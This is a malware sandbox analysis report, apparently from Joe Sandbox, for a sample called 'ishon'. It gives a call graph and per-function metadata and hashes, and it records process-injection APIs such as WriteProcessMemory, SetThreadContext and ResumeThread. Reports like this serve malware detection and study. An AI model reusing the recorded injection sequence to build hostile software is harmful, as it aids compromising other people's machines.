65740->65752 65742 13475f0 65743 1347819 65742->65743 65757 134c2e9 65742->65757 65762 134c2f8 65742->65762 65743->65737 65748 13477d0 65747->65748 65749 1347819 65748->65749 65750 134c2f8 2 API calls 65748->65750 65751 134c2e9 2 API calls 65748->65751 65749->65740 65750->65749 65751->65749 65753 134543f 65752->65753 65754 1348dda 65753->65754 65767 1348e38 65753->65767 65771 1348e29 65753->65771 65754->65742 65759 134c319 65757->65759 65758 134c33d 65758->65743 65759->65758 65775 134c49a 65759->65775 65779 134c4a8 65759->65779 65763 134c319 65762->65763 65764 134c33d 65763->65764 65765 134c4a8 2 API calls 65763->65765 65766 134c49a 2 API calls 65763->65766 65764->65743 65765->65764 65766->65764 65768 1348e7b 65767->65768 65769 1348e86 KiUserCallbackDispatcher 65768->65769 65770 1348eb0 65768->65770 65769->65770 65770->65754 65772 1348e7b 65771->65772 65773 1348e86 KiUserCallbackDispatcher 65772->65773 65774 1348eb0 65772->65774 65773->65774 65774->65754 65777 134c4b5 65775->65777 65776 134c4ef 65776->65758 65777->65776 65783 134b030 65777->65783 65781 134c4b5 65779->65781 65780 134c4ef 65780->65758 65781->65780 65782 134b030 2 API calls 65781->65782 65782->65780 65784 134b03b 65783->65784 65786 134d208 65784->65786 65787 134c834 65784->65787 65786->65786 65788 134c83f 65787->65788 65789 1344244 2 API calls 65788->65789 65790 134d277 65789->65790 65790->65786 65791 74cb560 65792 74cb56a 65791->65792 65796 7692fd0 65792->65796 65802 7692fc0 65792->65802 65793 74cb5a8 65797 7692fe5 65796->65797 65808 769314f 65797->65808 65815 7693000 65797->65815 65822 7693010 65797->65822 65798 7692ffb 65798->65793 65803 7692fd0 65802->65803 65805 769314f 4 API calls 65803->65805 65806 7693000 4 API calls 65803->65806 65807 7693010 4 API calls 65803->65807 65804 7692ffb 65804->65793 65805->65804 65806->65804 65807->65804 65810 7693155 65808->65810 65809 76932cf 65809->65798 65810->65809 65829 7693dc8 65810->65829 65833 7693dbc 65810->65833 65837 7694260 65810->65837 65841 7694258 65810->65841 65817 7693010 65815->65817 65816 76930bc 65816->65798 65817->65816 65818 7693dc8 CreateFileA 65817->65818 65819 7693dbc CreateFileA 65817->65819 65820 7694258 DuplicateHandle 65817->65820 65821 7694260 DuplicateHandle 65817->65821 65818->65817 65819->65817 65820->65817 65821->65817 65824 769303a 65822->65824 65823 76930bc 65823->65798 65824->65823 65825 7693dc8 CreateFileA 65824->65825 65826 7693dbc CreateFileA 65824->65826 65827 7694258 DuplicateHandle 65824->65827 65828 7694260 DuplicateHandle 65824->65828 65825->65824 65826->65824 65827->65824 65828->65824 65830 7693e1a CreateFileA 65829->65830 65832 7693ec3 65830->65832 65834 7693dc8 CreateFileA 65833->65834 65836 7693ec3 65834->65836 65838 76942a8 DuplicateHandle 65837->65838 65840 76942fb 65838->65840 65840->65810 65842 7694260 DuplicateHandle 65841->65842 65844 76942fb 65842->65844 65844->65810 65685 74cb742 65686 74cb74c 65685->65686 65690 7628948 65686->65690 65695 762893a 65686->65695 65687 74cb78a 65691 762895d 65690->65691 65694 7628973 65691->65694 65700 7628b57 65691->65700 65705 7628a73 65691->65705 65694->65687 65696 7628948 65695->65696 65697 7628a73 2 API calls 65696->65697 65698 7628b57 2 API calls 65696->65698 65699 7628973 65696->65699 65697->65699 65698->65699 65699->65687 65702 7628b5d 65700->65702 65701 7628d82 65701->65694 65702->65701 65710 7629731 65702->65710 65714 7629738 65702->65714 65707 7628a95 65705->65707 65706 7628d82 65706->65694 65707->65706 65708 7629731 VirtualProtect 65707->65708 65709 7629738 VirtualProtect 65707->65709 65708->65707 65709->65707 65711 7629738 VirtualProtect 65710->65711 65713 76297bb 65711->65713 65713->65702 65715 7629780 VirtualProtect 65714->65715 65717 76297bb 65715->65717 65717->65702

                                                                          Executed Functions

                                                                          Function 074CC5AD Relevance: 1.7, Strings: 1, Instructions: 475COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: df480b298c9a5210bb5fa4d2e7fd37c028cab2a1c1a643bc8e9abe91dd10dcd6
                                                                          • Instruction ID: 1a0926e9cb69df8602d8e3d211acc2f162a1a2a1ae4aed237a59733addde5e19
                                                                          • Opcode Fuzzy Hash: df480b298c9a5210bb5fa4d2e7fd37c028cab2a1c1a643bc8e9abe91dd10dcd6
                                                                          • Instruction Fuzzy Hash: 692228B4A01218CFDB94DF99D984BA9BBF2FB89301F5091AAD40DA7354DB349D81CF60
                                                                          Function 074CC5B8 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: d0b06937edf2037dae43a2db28a2c23745dde3ac2a8d9a58b106db3310684597
                                                                          • Instruction ID: e20969740cc016848ea82769da48099610a945dd117fed4c2f1a526273d5b33a
                                                                          • Opcode Fuzzy Hash: d0b06937edf2037dae43a2db28a2c23745dde3ac2a8d9a58b106db3310684597
                                                                          • Instruction Fuzzy Hash: 3F1218B4A05218CFDB94DF99D984BA9BBF2FB8A300F5091AAD40DA7345DB345D81CF60
                                                                          Function 0769CF91 Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0769D021
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 2706961497-0
                                                                          • Opcode ID: f62c61aed59f4565c4db854c2a57b43507c2f20fd264e22e04c9af2a6486c053
                                                                          • Instruction ID: c4c69da2ec0f6c2b7977bb7f29640ec3101dcc03f152f11b8bf02aa4de50344b
                                                                          • Opcode Fuzzy Hash: f62c61aed59f4565c4db854c2a57b43507c2f20fd264e22e04c9af2a6486c053
                                                                          • Instruction Fuzzy Hash: BA21F2B5D013099FCB10DFAAD980AEEFBF5FF48310F20842AE519A7210C775A945CBA1
                                                                          Function 0769CF98 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0769D021
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 2706961497-0
                                                                          • Opcode ID: 6decf930b3179997d2a2d3c043d42efd943821bfffde5b97f1bb779dd0082aa6
                                                                          • Instruction ID: cf67347c1f707203305fce6e5cc2b86f97ddd4daf81fe0718613b405f3548057
                                                                          • Opcode Fuzzy Hash: 6decf930b3179997d2a2d3c043d42efd943821bfffde5b97f1bb779dd0082aa6
                                                                          • Instruction Fuzzy Hash: 822114B5D013099FCB10DFAAD980AEEFBF5FF48310F20842AE519A7210C775A941CBA0
                                                                          Function 0769F428 Relevance: 1.6, APIs: 1, Instructions: 57nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtResumeThread.NTDLL(?,?), ref: 0769F49E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 0250a0632ee70a9e2cd93c99500083ef66917d68c83ac3af74e1a1a3c2c5d3d5
                                                                          • Instruction ID: 7ed218de8f5933a1cdab168ff2e8a03f3dd930f26c9046eb2ddad122d702185c
                                                                          • Opcode Fuzzy Hash: 0250a0632ee70a9e2cd93c99500083ef66917d68c83ac3af74e1a1a3c2c5d3d5
                                                                          • Instruction Fuzzy Hash: 58111AB1D002099FCB10DFAAC845AEEFBF8FF48724F50842AD419A7250CB789545CFA1
                                                                          Function 0769F430 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • NtResumeThread.NTDLL(?,?), ref: 0769F49E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 097082c75b51c13df34432e3c564c495801a6ea884f11fde19a1de4554c2bc4c
                                                                          • Instruction ID: 8accf739d3cb9f82f610f3e994624d191168b39f8efc0d9b958e49e1cd2fd1cd
                                                                          • Opcode Fuzzy Hash: 097082c75b51c13df34432e3c564c495801a6ea884f11fde19a1de4554c2bc4c
                                                                          • Instruction Fuzzy Hash: 8D11E7B1D002099FDB10DFAAC444AEEFBF9FF48724F50842AD419A7250CB79A945CFA5
                                                                          Function 074C40E0 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: 83b182d710cc99840441505eab76bfbfb9c9c97bb35acaff4248a4306cab6d80
                                                                          • Instruction ID: 6fea80cc36e8ae77f30d248e856a6068d65cee7054926ef4e3a6787003aa2042
                                                                          • Opcode Fuzzy Hash: 83b182d710cc99840441505eab76bfbfb9c9c97bb35acaff4248a4306cab6d80
                                                                          • Instruction Fuzzy Hash: 76B1F6B8E05258CFDB94CF69DA94BDDBBF2BF89300F20956AD409AB251DB345985CF00
                                                                          Function 074C45F5 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7
                                                                          • API String ID: 0-1790921346
                                                                          • Opcode ID: 9cb921f2b03c9e391d127c105f97e14a1328efc35ccba743cb75660aa2285800
                                                                          • Instruction ID: 03dfc28af0feebc1c365410a0f9033908dc869e2592ac14cf256bac930295571
                                                                          • Opcode Fuzzy Hash: 9cb921f2b03c9e391d127c105f97e14a1328efc35ccba743cb75660aa2285800
                                                                          • Instruction Fuzzy Hash: CF415EB5E04A588BEB58CF6BDD4469AFAF7BFC9201F14C1BA840CA6254DB3409869F01
                                                                          Function 074C3608 Relevance: .3, Instructions: 342COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a65299a3650905a8572068b76f10b13d32c3c7789abe314e17334335aa748dd
                                                                          • Instruction ID: 2131c106ec3f857c25a1e011225e32062f0a917997474ef9375a0138fe6123d5
                                                                          • Opcode Fuzzy Hash: 6a65299a3650905a8572068b76f10b13d32c3c7789abe314e17334335aa748dd
                                                                          • Instruction Fuzzy Hash: 48E1D6B4E05218CFDBA4CF66D984BDEBBF2BB4A304F1094AAD009A7351DB345985CF42
                                                                          Function 074C3618 Relevance: .3, Instructions: 340COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b8ccea3e5524451c553b788a242e97074bfc25b4367c787d97c1bed45a6333f5
                                                                          • Instruction ID: 584019e5372ff57dd2a4f0e081fd94352959fca6b42c11372ee3d055b38458be
                                                                          • Opcode Fuzzy Hash: b8ccea3e5524451c553b788a242e97074bfc25b4367c787d97c1bed45a6333f5
                                                                          • Instruction Fuzzy Hash: CEE1C5B4E05218CFDBA4CF66D984BEDBBF2AB4A305F10D4AAD009A7251DB345985CF42
                                                                          Function 075F7F18 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1785 75f7f18-75f7f55 1787 75f7f77-75f7f8d call 75f7d20 1785->1787 1788 75f7f57-75f7f5a 1785->1788 1794 75f8303-75f8317 1787->1794 1795 75f7f93-75f7f9f 1787->1795 1900 75f7f5c call 75f8888 1788->1900 1901 75f7f5c call 75f8830 1788->1901 1791 75f7f62-75f7f64 1791->1787 1792 75f7f66-75f7f6e 1791->1792 1792->1787 1803 75f8357-75f8360 1794->1803 1796 75f7fa5-75f7fa8 1795->1796 1797 75f80d0-75f80d7 1795->1797 1801 75f7fab-75f7fb4 1796->1801 1798 75f80dd-75f80e6 1797->1798 1799 75f8206-75f8240 call 75f7728 1797->1799 1798->1799 1802 75f80ec-75f81f8 call 75f7728 call 75f7cb8 call 75f7728 1798->1802 1898 75f8243 call 75fa6d0 1799->1898 1899 75f8243 call 75fa6c0 1799->1899 1805 75f7fba-75f7fce 1801->1805 1806 75f83f8 1801->1806 1896 75f81fa 1802->1896 1897 75f8203 1802->1897 1807 75f8325-75f832e 1803->1807 1808 75f8362-75f8369 1803->1808 1822 75f7fd4-75f8069 call 75f7d20 * 2 call 75f7728 call 75f7cb8 call 75f7d60 call 75f7e08 call 75f7e70 1805->1822 1823 75f80c0-75f80ca 1805->1823 1810 75f83fd-75f8401 1806->1810 1807->1806 1817 75f8334-75f8346 1807->1817 1812 75f836b-75f83ae call 75f7728 1808->1812 1813 75f83b7-75f83be 1808->1813 1814 75f840c 1810->1814 1815 75f8403 1810->1815 1812->1813 1818 75f83e3-75f83f6 1813->1818 1819 75f83c0-75f83d0 1813->1819 1826 75f840d 1814->1826 1815->1814 1829 75f8348-75f834d 1817->1829 1830 75f8356 1817->1830 1818->1810 1819->1818 1835 75f83d2-75f83da 1819->1835 1875 75f806b-75f8083 call 75f7e08 call 75f7728 call 75f79d8 1822->1875 1876 75f8088-75f80bb call 75f7e70 1822->1876 1823->1797 1823->1801 1826->1826 1902 75f8350 call 75fae61 1829->1902 1903 75f8350 call 75fae70 1829->1903 1830->1803 1835->1818 1843 75f8249-75f82fa call 75f7728 1843->1794 1875->1876 1876->1823 1896->1897 1897->1799 1898->1843 1899->1843 1900->1791 1901->1791 1902->1830 1903->1830
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q$4']q
                                                                          • API String ID: 0-705557208
                                                                          • Opcode ID: 101adfe53ad72dbcbe323f8b0ce4c973c3e1317392084d1aa5767d44ef16dd90
                                                                          • Instruction ID: 3afe1d921c1440b12f0099d8560952620aaf19f5ff21e60574b672cc4f90ffe0
                                                                          • Opcode Fuzzy Hash: 101adfe53ad72dbcbe323f8b0ce4c973c3e1317392084d1aa5767d44ef16dd90
                                                                          • Instruction Fuzzy Hash: 34F1F974A10219DFCB08DFA4D998A9DB7B2FF88300F518559E506AB3A5DB70FC42CB91
                                                                          Function 07481EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520478626.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7480000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: 245f9be01d33b5d822a85c9ca8f15d04d99ebfcdb5c19eb8d5c05ca2640f0e38
                                                                          • Instruction ID: d6c54d4f4e6937b1d74a1406cd6cabbcb07e0e01e6cf3e9afd8abc5fc87afeef
                                                                          • Opcode Fuzzy Hash: 245f9be01d33b5d822a85c9ca8f15d04d99ebfcdb5c19eb8d5c05ca2640f0e38
                                                                          • Instruction Fuzzy Hash: 1A42C2B4E0420ECFCB54EBA8D598AEEBBB2FF49301F50841AD912AB354CB745946CF51
                                                                          Function 074829D0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520478626.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7480000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q$4']q
                                                                          • API String ID: 0-3120983240
                                                                          • Opcode ID: 5c7eb93e633eda4f0d44974cde87a51087022f3117f9569d1d64f4665c37cc56
                                                                          • Instruction ID: b998beaac349070a2dcd97e6bd237c295a8db05d521e1b874bf3f5fe57446400
                                                                          • Opcode Fuzzy Hash: 5c7eb93e633eda4f0d44974cde87a51087022f3117f9569d1d64f4665c37cc56
                                                                          • Instruction Fuzzy Hash: DAF1A1B4D1121DEFCB64EFA4E4986EDBBB2BF49312F20442AE406A7354CB755886CF41
                                                                          Function 074CEA8F Relevance: 2.6, Strings: 2, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq$Haq
                                                                          • API String ID: 0-3785302501
                                                                          • Opcode ID: 7cdf4eada8c40bb0d9757219554fd93180e3de080177e1be1b39688b0d444c53
                                                                          • Instruction ID: 34aa8c1ede795296bf69b099abec59f89a025c5837e5b4968e7b4884deae6af0
                                                                          • Opcode Fuzzy Hash: 7cdf4eada8c40bb0d9757219554fd93180e3de080177e1be1b39688b0d444c53
                                                                          • Instruction Fuzzy Hash: 765123B52047518FD365CF39C4903ABBBE2EF81320F148A6ED0568B7A5EB74E80AC751
                                                                          Function 0769D9FC Relevance: 1.7, APIs: 1, Instructions: 204processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0769DBE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 3d793b8be0573957f46fe2cffd14be50a40bf528969dcfdc5c9e00ba5373cdf0
                                                                          • Instruction ID: 141018b55eae0ebb9a5d40cec05bd51aacaca784cfaf8feec8a4b200d6ef1241
                                                                          • Opcode Fuzzy Hash: 3d793b8be0573957f46fe2cffd14be50a40bf528969dcfdc5c9e00ba5373cdf0
                                                                          • Instruction Fuzzy Hash: 068115B1E0065A9FDF10CFA9C8817ADBBF5AF48314F148539E85AA7384DB749891CB81
                                                                          Function 0769DA08 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0769DBE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 065879a9b9b68f88a03e4a34cf292970a1db372d386e526b090581653c441c87
                                                                          • Instruction ID: d09b7e80a79464feb0f2f2c99f75e7233b0a522eeced2cf067571fb4e4dce701
                                                                          • Opcode Fuzzy Hash: 065879a9b9b68f88a03e4a34cf292970a1db372d386e526b090581653c441c87
                                                                          • Instruction Fuzzy Hash: 088114B1E0065A9FDF10CFA9C8817ADBBF6BF48314F148539E85AA7384D7749891CB81
                                                                          Function 07693DBC Relevance: 1.6, APIs: 1, Instructions: 108fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07693EB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 42b449502deeb49b3dbd6935dbc3184e8cab3f7063e55200b8a17760732ef44d
                                                                          • Instruction ID: dd2439b14b5dad01625ec60e8de99aafb0eb57eda21eae17743b00a560b8a8fb
                                                                          • Opcode Fuzzy Hash: 42b449502deeb49b3dbd6935dbc3184e8cab3f7063e55200b8a17760732ef44d
                                                                          • Instruction Fuzzy Hash: C74137B1C002199FDF10DFA9C885B9EBFB5FF48710F14842AE816A7350DB7594458F91
                                                                          Function 07693DC8 Relevance: 1.6, APIs: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 07693EB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 0113d237f8d1b0639650c3cd4a1ce70c623295cd2b3887a24791235cb8a84428
                                                                          • Instruction ID: 4305a35e292a63dbcb7cdb97548f8d1fa58a02fdcd456658c2c2347b4f5cf839
                                                                          • Opcode Fuzzy Hash: 0113d237f8d1b0639650c3cd4a1ce70c623295cd2b3887a24791235cb8a84428
                                                                          • Instruction Fuzzy Hash: 924135B1D002099FDF10DFAAC885B9EBFB6FF08710F14842AE816A7350DB7594818B91
                                                                          Function 07694258 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 076942EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 6331129f96aa7991f92831c8bc1d959564816eed4a5c2ca9ba9f12e481196aec
                                                                          • Instruction ID: 12a2010ccc413f609c7466e6faaeb1a232cbc8478980c7eae12d7278185fcfc7
                                                                          • Opcode Fuzzy Hash: 6331129f96aa7991f92831c8bc1d959564816eed4a5c2ca9ba9f12e481196aec
                                                                          • Instruction Fuzzy Hash: E6215AB18002599FDB10DFAAC841AEEFFF5FF48310F508429E559A7250C7399955DBA0
                                                                          Function 0769EDB9 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0769EE50
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: f1403788448962f7f5b7544ae3973b5af21909dfaf9bb4527a6617d10951eda5
                                                                          • Instruction ID: c40551e7df3747c9ed724e46ae18f64d0d447b4042b6a74984322bbc257f329b
                                                                          • Opcode Fuzzy Hash: f1403788448962f7f5b7544ae3973b5af21909dfaf9bb4527a6617d10951eda5
                                                                          • Instruction Fuzzy Hash: EE2115B69003499FCF10DFA9C885BEEBBF5FF48310F108429E959A7250C7799954CBA4
                                                                          Function 0769EDC0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0769EE50
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: 1dd172142939cb5b1e4db4b470fba3189eecd3e7c06ade7abdae59434e0e44aa
                                                                          • Instruction ID: a2b630a7f039830048ba5d456bfc06efb07717b7e34eefdea39835b91a55266f
                                                                          • Opcode Fuzzy Hash: 1dd172142939cb5b1e4db4b470fba3189eecd3e7c06ade7abdae59434e0e44aa
                                                                          • Instruction Fuzzy Hash: 1E2127B59003499FCF10DFA9C885BEEBBF5FF48310F108429E919A7250C7799944CBA0
                                                                          Function 0769E510 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0769E596
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: f0620ec4148dc9a7c61dcba4e6b6ed39d868c46577a4f151ab5e482b1006517a
                                                                          • Instruction ID: ee65b5e5d36f10c349fd513c5bb5df9241d590a70b4e9b345eebcc8b8f57d4c5
                                                                          • Opcode Fuzzy Hash: f0620ec4148dc9a7c61dcba4e6b6ed39d868c46577a4f151ab5e482b1006517a
                                                                          • Instruction Fuzzy Hash: 3D2114B19002099FDB10DFAAC4857AEBBF4EF48324F50842AD559A7240DB79A985CFA4
                                                                          Function 07694260 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 076942EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
